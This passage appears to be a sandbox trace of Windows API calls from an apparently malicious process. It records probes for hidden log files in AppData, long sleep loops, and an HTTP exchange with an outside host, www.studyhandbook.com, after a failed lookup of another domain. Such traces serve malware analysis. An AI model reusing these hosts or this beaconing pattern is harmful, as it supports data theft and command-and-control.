EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.266] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0237.267] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.267] socket (af=2, type=1, protocol=6) returned 0xa90 [0237.267] getaddrinfo (in: pNodeName="www.gentlesuccess.net", pServiceName="80", pHints=0x6f0b418*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0b448 | out: ppResult=0x6f0b448*=0x0) returned 11001 [0237.287] Sleep (dwMilliseconds=0x7d0) [0237.295] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.295] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.295] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0237.295] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.295] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.295] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.295] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.295] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.295] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.296] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.296] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.296] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.296] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.296] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.296] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.296] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.296] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.296] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.296] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.296] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.296] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.296] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.296] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.296] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.296] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.296] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.296] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.296] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.297] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.297] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.297] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.297] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.297] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.297] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.297] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.297] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.297] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.297] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.297] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0237.297] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.297] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0237.297] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0237.297] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0237.297] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0237.297] Sleep (dwMilliseconds=0x7d0) [0237.341] Sleep (dwMilliseconds=0x7d0) [0237.342] Sleep (dwMilliseconds=0x7d0) [0237.358] Sleep (dwMilliseconds=0x7d0) [0237.374] Sleep (dwMilliseconds=0x7d0) [0237.388] Sleep (dwMilliseconds=0x7d0) [0237.404] Sleep (dwMilliseconds=0x7d0) [0237.420] Sleep (dwMilliseconds=0x7d0) [0237.436] Sleep (dwMilliseconds=0x7d0) [0237.451] Sleep (dwMilliseconds=0x7d0) [0237.466] Sleep (dwMilliseconds=0x7d0) [0237.483] Sleep (dwMilliseconds=0x7d0) [0237.498] Sleep (dwMilliseconds=0x7d0) [0237.513] Sleep (dwMilliseconds=0x7d0) [0237.529] Sleep (dwMilliseconds=0x7d0) [0237.545] Sleep (dwMilliseconds=0x7d0) [0237.560] Sleep (dwMilliseconds=0x7d0) [0237.576] Sleep (dwMilliseconds=0x7d0) [0237.598] Sleep (dwMilliseconds=0x7d0) [0237.607] Sleep (dwMilliseconds=0x7d0) [0237.623] Sleep (dwMilliseconds=0x7d0) [0237.638] Sleep (dwMilliseconds=0x7d0) [0237.655] Sleep (dwMilliseconds=0x7d0) [0237.670] Sleep (dwMilliseconds=0x7d0) [0237.687] Sleep (dwMilliseconds=0x7d0) [0237.700] Sleep (dwMilliseconds=0x7d0) [0237.716] Sleep (dwMilliseconds=0x7d0) [0237.732] Sleep (dwMilliseconds=0x7d0) [0237.748] Sleep (dwMilliseconds=0x7d0) [0237.763] Sleep (dwMilliseconds=0x7d0) [0237.778] Sleep (dwMilliseconds=0x7d0) [0237.795] Sleep (dwMilliseconds=0x7d0) [0237.810] Sleep (dwMilliseconds=0x7d0) [0237.825] Sleep (dwMilliseconds=0x7d0) [0237.841] Sleep (dwMilliseconds=0x7d0) [0237.856] Sleep (dwMilliseconds=0x7d0) [0237.873] Sleep (dwMilliseconds=0x7d0) [0237.888] Sleep (dwMilliseconds=0x7d0) [0237.905] Sleep (dwMilliseconds=0x7d0) [0237.919] Sleep (dwMilliseconds=0x7d0) [0237.935] Sleep (dwMilliseconds=0x7d0) [0237.950] Sleep (dwMilliseconds=0x7d0) [0237.966] Sleep (dwMilliseconds=0x7d0) [0237.982] Sleep (dwMilliseconds=0x7d0) [0237.997] Sleep (dwMilliseconds=0x7d0) [0238.013] Sleep (dwMilliseconds=0x7d0) [0238.028] Sleep (dwMilliseconds=0x7d0) [0238.063] Sleep (dwMilliseconds=0x7d0) [0238.083] Sleep (dwMilliseconds=0x7d0) [0238.105] Sleep (dwMilliseconds=0x7d0) [0238.106] Sleep (dwMilliseconds=0x7d0) [0238.123] Sleep (dwMilliseconds=0x7d0) [0238.137] Sleep (dwMilliseconds=0x7d0) [0238.153] Sleep (dwMilliseconds=0x7d0) [0238.170] Sleep (dwMilliseconds=0x7d0) [0238.184] Sleep (dwMilliseconds=0x7d0) [0238.286] Sleep (dwMilliseconds=0x7d0) [0238.293] Sleep (dwMilliseconds=0x7d0) [0238.309] Sleep (dwMilliseconds=0x7d0) [0238.324] Sleep (dwMilliseconds=0x7d0) [0238.340] Sleep (dwMilliseconds=0x7d0) [0238.356] Sleep (dwMilliseconds=0x7d0) [0238.372] Sleep (dwMilliseconds=0x7d0) [0238.388] Sleep (dwMilliseconds=0x7d0) [0238.403] Sleep (dwMilliseconds=0x7d0) [0238.418] Sleep (dwMilliseconds=0x7d0) [0238.434] Sleep (dwMilliseconds=0x7d0) [0238.449] Sleep (dwMilliseconds=0x7d0) [0238.465] Sleep (dwMilliseconds=0x7d0) [0238.480] Sleep (dwMilliseconds=0x7d0) [0238.497] Sleep (dwMilliseconds=0x7d0) [0238.512] Sleep (dwMilliseconds=0x7d0) [0238.527] Sleep (dwMilliseconds=0x7d0) [0238.543] Sleep (dwMilliseconds=0x7d0) [0238.559] Sleep (dwMilliseconds=0x7d0) [0238.574] Sleep (dwMilliseconds=0x7d0) [0238.590] Sleep (dwMilliseconds=0x7d0) [0238.606] Sleep (dwMilliseconds=0x7d0) [0238.621] Sleep (dwMilliseconds=0x7d0) [0238.636] Sleep (dwMilliseconds=0x7d0) [0238.652] Sleep (dwMilliseconds=0x7d0) [0238.668] Sleep (dwMilliseconds=0x7d0) [0238.683] Sleep (dwMilliseconds=0x7d0) [0238.699] Sleep (dwMilliseconds=0x7d0) [0238.717] Sleep (dwMilliseconds=0x7d0) [0238.733] Sleep (dwMilliseconds=0x7d0) [0238.746] Sleep (dwMilliseconds=0x7d0) [0238.761] Sleep (dwMilliseconds=0x7d0) [0238.777] Sleep (dwMilliseconds=0x7d0) [0238.793] Sleep (dwMilliseconds=0x7d0) [0238.808] Sleep (dwMilliseconds=0x7d0) [0238.824] Sleep (dwMilliseconds=0x7d0) [0238.857] Sleep (dwMilliseconds=0x7d0) [0238.875] Sleep (dwMilliseconds=0x7d0) [0238.886] Sleep (dwMilliseconds=0x7d0) [0238.902] Sleep (dwMilliseconds=0x7d0) [0238.917] Sleep (dwMilliseconds=0x7d0) [0238.934] Sleep (dwMilliseconds=0x7d0) [0238.949] Sleep (dwMilliseconds=0x7d0) [0238.965] Sleep (dwMilliseconds=0x7d0) [0238.980] Sleep (dwMilliseconds=0x7d0) [0238.995] Sleep (dwMilliseconds=0x7d0) [0239.011] Sleep (dwMilliseconds=0x7d0) [0239.027] Sleep (dwMilliseconds=0x7d0) [0239.043] Sleep (dwMilliseconds=0x7d0) [0239.058] Sleep (dwMilliseconds=0x7d0) [0239.073] Sleep (dwMilliseconds=0x7d0) [0239.089] Sleep (dwMilliseconds=0x7d0) [0239.171] Sleep (dwMilliseconds=0x7d0) [0239.183] Sleep (dwMilliseconds=0x7d0) [0239.245] Sleep (dwMilliseconds=0x7d0) [0239.260] Sleep (dwMilliseconds=0x7d0) [0239.277] Sleep (dwMilliseconds=0x7d0) [0239.292] Sleep (dwMilliseconds=0x7d0) [0239.327] Sleep (dwMilliseconds=0x7d0) [0239.338] Sleep (dwMilliseconds=0x7d0) [0239.354] Sleep (dwMilliseconds=0x7d0) [0239.370] Sleep (dwMilliseconds=0x7d0) [0239.386] Sleep (dwMilliseconds=0x7d0) [0239.401] Sleep (dwMilliseconds=0x7d0) [0239.417] Sleep (dwMilliseconds=0x7d0) [0239.432] Sleep (dwMilliseconds=0x7d0) [0239.449] Sleep (dwMilliseconds=0x7d0) [0239.463] Sleep (dwMilliseconds=0x7d0) [0239.479] Sleep (dwMilliseconds=0x7d0) [0239.495] Sleep (dwMilliseconds=0x7d0) [0239.510] Sleep (dwMilliseconds=0x7d0) [0239.526] Sleep (dwMilliseconds=0x7d0) [0239.541] Sleep (dwMilliseconds=0x7d0) [0239.557] Sleep (dwMilliseconds=0x7d0) [0239.574] Sleep (dwMilliseconds=0x7d0) [0239.616] Sleep (dwMilliseconds=0x7d0) [0239.619] Sleep (dwMilliseconds=0x7d0) [0239.635] Sleep (dwMilliseconds=0x7d0) [0239.650] Sleep (dwMilliseconds=0x7d0) [0239.666] Sleep (dwMilliseconds=0x7d0) [0239.682] Sleep (dwMilliseconds=0x7d0) [0239.698] Sleep (dwMilliseconds=0x7d0) [0239.713] Sleep (dwMilliseconds=0x7d0) [0239.729] Sleep (dwMilliseconds=0x7d0) [0239.745] Sleep (dwMilliseconds=0x7d0) [0239.760] Sleep (dwMilliseconds=0x7d0) [0244.390] Sleep (dwMilliseconds=0x7d0) [0244.393] Sleep (dwMilliseconds=0x7d0) [0244.409] Sleep (dwMilliseconds=0x7d0) [0244.424] Sleep (dwMilliseconds=0x7d0) [0244.440] Sleep (dwMilliseconds=0x7d0) [0244.461] Sleep (dwMilliseconds=0x7d0) [0244.471] Sleep (dwMilliseconds=0x7d0) [0244.486] Sleep (dwMilliseconds=0x7d0) [0244.502] Sleep (dwMilliseconds=0x7d0) [0244.519] Sleep (dwMilliseconds=0x7d0) [0244.534] Sleep (dwMilliseconds=0x7d0) [0244.551] Sleep (dwMilliseconds=0x7d0) [0244.572] Sleep (dwMilliseconds=0x7d0) [0244.580] Sleep (dwMilliseconds=0x7d0) [0244.596] Sleep (dwMilliseconds=0x7d0) [0244.611] Sleep (dwMilliseconds=0x7d0) [0244.628] Sleep (dwMilliseconds=0x7d0) [0244.643] Sleep (dwMilliseconds=0x7d0) [0244.659] Sleep (dwMilliseconds=0x7d0) [0244.674] Sleep (dwMilliseconds=0x7d0) [0244.689] Sleep (dwMilliseconds=0x7d0) [0244.705] Sleep (dwMilliseconds=0x7d0) [0244.720] Sleep (dwMilliseconds=0x7d0) [0244.736] Sleep (dwMilliseconds=0x7d0) [0244.779] Sleep (dwMilliseconds=0x7d0) [0244.784] Sleep (dwMilliseconds=0x7d0) [0244.799] Sleep (dwMilliseconds=0x7d0) [0244.814] Sleep (dwMilliseconds=0x7d0) [0244.831] Sleep (dwMilliseconds=0x7d0) [0244.846] Sleep (dwMilliseconds=0x7d0) [0244.861] Sleep (dwMilliseconds=0x7d0) [0244.877] Sleep (dwMilliseconds=0x7d0) [0244.893] Sleep (dwMilliseconds=0x7d0) [0244.908] Sleep (dwMilliseconds=0x7d0) [0244.923] Sleep (dwMilliseconds=0x7d0) [0244.940] Sleep (dwMilliseconds=0x7d0) [0244.954] Sleep (dwMilliseconds=0x7d0) [0244.970] Sleep (dwMilliseconds=0x7d0) [0245.007] Sleep (dwMilliseconds=0x7d0) [0245.017] Sleep (dwMilliseconds=0x7d0) [0245.033] Sleep (dwMilliseconds=0x7d0) [0245.049] Sleep (dwMilliseconds=0x7d0) [0245.064] Sleep (dwMilliseconds=0x7d0) [0245.079] Sleep (dwMilliseconds=0x7d0) [0245.095] Sleep (dwMilliseconds=0x7d0) [0245.110] Sleep (dwMilliseconds=0x7d0) [0245.126] Sleep (dwMilliseconds=0x7d0) [0245.142] Sleep (dwMilliseconds=0x7d0) [0245.158] Sleep (dwMilliseconds=0x7d0) [0245.173] Sleep (dwMilliseconds=0x7d0) [0245.188] Sleep (dwMilliseconds=0x7d0) [0245.205] Sleep (dwMilliseconds=0x7d0) [0245.220] Sleep (dwMilliseconds=0x7d0) [0245.235] Sleep (dwMilliseconds=0x7d0) [0245.251] Sleep (dwMilliseconds=0x7d0) [0245.270] Sleep (dwMilliseconds=0x7d0) [0245.282] Sleep (dwMilliseconds=0x7d0) [0245.298] Sleep (dwMilliseconds=0x7d0) [0245.314] Sleep (dwMilliseconds=0x7d0) [0245.329] Sleep (dwMilliseconds=0x7d0) [0245.345] Sleep (dwMilliseconds=0x7d0) [0245.361] Sleep (dwMilliseconds=0x7d0) [0245.376] Sleep (dwMilliseconds=0x7d0) [0245.391] Sleep (dwMilliseconds=0x7d0) [0245.407] Sleep (dwMilliseconds=0x7d0) [0245.423] Sleep (dwMilliseconds=0x7d0) [0245.438] Sleep (dwMilliseconds=0x7d0) [0245.454] Sleep (dwMilliseconds=0x7d0) [0245.479] Sleep (dwMilliseconds=0x7d0) [0245.485] Sleep (dwMilliseconds=0x7d0) [0245.500] Sleep (dwMilliseconds=0x7d0) [0245.516] Sleep (dwMilliseconds=0x7d0) [0245.532] Sleep (dwMilliseconds=0x7d0) [0245.548] Sleep (dwMilliseconds=0x7d0) [0245.563] Sleep (dwMilliseconds=0x7d0) [0245.579] Sleep (dwMilliseconds=0x7d0) [0245.594] Sleep (dwMilliseconds=0x7d0) [0245.610] Sleep (dwMilliseconds=0x7d0) [0245.625] Sleep (dwMilliseconds=0x7d0) [0245.641] Sleep (dwMilliseconds=0x7d0) [0245.657] Sleep (dwMilliseconds=0x7d0) [0245.681] Sleep (dwMilliseconds=0x7d0) [0245.688] Sleep (dwMilliseconds=0x7d0) [0245.703] Sleep (dwMilliseconds=0x7d0) [0245.719] Sleep (dwMilliseconds=0x7d0) [0245.734] Sleep (dwMilliseconds=0x7d0) [0245.770] Sleep (dwMilliseconds=0x7d0) [0245.782] Sleep (dwMilliseconds=0x7d0) [0245.797] Sleep (dwMilliseconds=0x7d0) [0245.812] Sleep (dwMilliseconds=0x7d0) [0245.866] socket (af=2, type=1, protocol=6) returned 0x1344 [0245.868] getaddrinfo (in: pNodeName="www.studyhandbook.com", pServiceName="80", pHints=0x6f0b7b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0b7e8 | out: ppResult=0x6f0b7e8*=0x6eff430*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f36980*(sa_family=2, sin_port=0x50, sin_addr="209.99.40.222"), ai_next=0x0)) returned 0 [0246.057] connect (s=0x1344, name=0x3f36980*(sa_family=2, sin_port=0x50, sin_addr="209.99.40.222"), namelen=16) returned 0 [0246.209] send (s=0x1344, buf=0x25a505a*, len=172, flags=0) returned 172 [0246.211] setsockopt (s=0x1344, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0246.211] recv (in: s=0x1344, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 23242 [0246.623] closesocket (s=0x1344) returned 0 [0246.623] Sleep (dwMilliseconds=0x7d0) [0246.688] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.688] 